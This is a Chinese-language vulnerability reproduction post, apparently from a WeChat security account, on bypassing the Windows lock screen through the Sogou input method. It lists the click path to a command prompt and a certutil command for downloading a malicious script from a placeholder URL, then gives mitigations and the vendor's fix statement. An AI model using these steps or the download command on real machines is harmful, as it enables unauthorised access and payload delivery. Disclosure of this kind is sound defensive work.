绕过开机密码-搜狗输入法0day复现

搜狗输入法是一款由搜狗公司开发的，基于搜索引擎技术的、特别适合网民使用的、新一代的输入法产品，用户可以通过互联网备份自己的个性化词库和配置信息。搜狗输入法的前身是搜狗拼音输入法，自2006年6月推出以来，因其用户体验佳、词库丰富，用户存有量较大。

漏洞基本情況

1.在Windows在鎖屛的狀態下，可以繞過系統的登錄密碼，从而調用cmd執行任意的命令，需要主機處於聯網狀態。win10、win11受其影響较为严重

搜狗输入法可以简单绕过Windows锁屏机制，在锁屏的情况下执行CMD命令，甚至可以直接夺取本机系统权限。

1、 漏洞影响

所有版本

2、漏洞等级：

高危

漏洞復現

Windows處於鎖屛的狀態之下，切換到搜狗輸入法，并且調出屛幕鍵盤。

拖動屛幕鍵盤兩次或者右擊使出現搜狗輸入法狀態欄，單擊搜狗輸入法菜單，進入遊戲中心

點登錄，選擇QQ手機版登录進入QQ官網首頁，选择下載，此時彈出下載另存為對話框，即可在Windows搜索框輸入cmd進入命令行執行命令，若權限不足可右擊以管理員權限運行

此時可執行任意與登錄後無異的命令，甚至可下載惡意腳本文件：

certutil -urlcache -split -f URL/fileName

安全防護

暫時隱藏搜狗輸入法狀態欄个人終端請關閉mstsc遠程連接，服務器資産請修改遠程鏈接默認端口3389或卸載搜狗輸入法

检查自身系统是否被植入后门

搜狗输入法官方答复：

在微软修复该漏洞前，为更有效保护用户安全，我们已采取了主动规避措施，在Windows登录界面下搜狗输入法将主动退出加载执行。 目前已修复，请放心使用搜狗输入法。

原文始发于微信公众号（信安王子）：绕过开机密码-搜狗输入法0day复现